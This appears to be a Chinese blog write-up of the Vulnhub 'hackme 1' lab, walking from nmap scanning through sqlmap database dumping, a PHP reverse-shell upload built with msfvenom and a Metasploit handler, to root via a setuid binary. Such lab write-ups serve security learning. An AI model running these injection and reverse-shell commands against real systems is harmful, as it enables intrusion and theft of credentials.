当前位置:网站首页>vulhub靶场学习日记hackme1
vulhub靶场学习日记hackme1
2022-07-31 05:10:00 【北纬二十七度雨】
Hackme靶机
目的:拿到root权限
下载地址: https://www.vulnhub.com/entry/hackme-1,330/
https://www.vulnhub.com/entry/hackme-1,330/
选择第二个mirror
Vm打开,网络模式我选择的是nat
开整
Kali ip地址:192.168.192.129
Nmap扫描:
1,2,254地址为网卡地址
192.168.192.130即为靶机地址
扫描靶机端口
开启了80端口httpd服务,22端口ssh服务
扫一下目录:
发现uploads目录,目测可能有文件上传漏洞
打开靶机网站
尝试弱密码登陆,失败了。。。。。。。!
先注册admin登陆一下
登陆后search一下
测试一下是否有sql注入点
判断具有sql注入,而且根据头部判断还是post注入
可以手工注入,也可以sqlmap,这里使用sqlmap
先抓包
保存成txt文本
Sqlmap工具
sqlmap -r /home/kali/Desktop/bp.txt -p search --dbs
-r:指定文件
-p:指定参数
--dbs:数据库
爆表(webapphacking)
sqlmap -r /home/kali/Desktop/bp.txt -p search -D webapphacking –tables
爆字段
sqlmap -r /home/kali/Desktop/bp.txt -p search -D webapphacking -T users –columns
爆密码
sqlmap -r /home/kali/Desktop/bp.txt -p search -D webapphacking -T users -C name,pasword –dump
这个superadmin 的密码才是我想要的
Superadmin登陆,发现有上传点
上传的目录刚好是uploads,经过测试没有任何过滤,php可上传
直接上传反弹shell木马,
利用msfvenom平台生成木马
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.192.129 lport=7777 R > shell3.php
(防止没有权限执行)
chmod 777 shell3.php
kali开启msfconsole平台
1 使用handler监听模块
msf > use exploit/multi/handler
2 设置payload
msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD =>php/meterpreter/reverse_tcp
3 设置监听主机
msfexploit(multi/handler) > set LHOST 192.168.192.129
LHOST =>192.168.192.129
4 设置监听端口(默认4444)
msfexploit(multi/handler) > set LPORT 7777
LPORT => 7777
5 发动攻击
msfexploit(multi/handler) > exploit
注:再exploit之前要远程访问你上传的后门文件 ,并监听
攻击前监听端口
上传shell3.php,在执行该文件
开始攻击,成功反弹,开启shell,
Whoami查看当前工作用户,uname -a查看操作系统
切换home目录
发现hackme没啥东西,在legacy目录下有个bash执行文件
./touchmenot
执行该文件,发现提权成功
边栏推荐
猜你喜欢
随机推荐
Redis first meeting
关于LocalDateTime的全局返回时间带“T“的时间格式处理
Why use Flink and how to get started with Flink?
mysql 的简单运用命令
数据库上机实验4 数据更新和视图
[mysql improves query efficiency] Mysql database query is slow to solve the problem
运用flask框架发送短信验证码的流程及具体代码
pytorch中的一维、二维、三维卷积操作
16 【打包上线 图片懒加载】
剑指offer基础版 --- 第24天
uni-app进阶之内嵌应用【day14】
wpf ScrowViewer水平滚动
【C语言趣味小游戏——猜数字】
wpf wrapPanel居中并从左到右排列
08 【生命周期 组件】
Flask 的初识
Simple command of mysql
Interview Redis High Reliability | Master-Slave Mode, Sentinel Mode, Cluster Cluster Mode
Refinement of the four major collection frameworks: Summary of List core knowledge
Redis进阶 - 缓存问题:一致性、穿击、穿透、雪崩、污染等.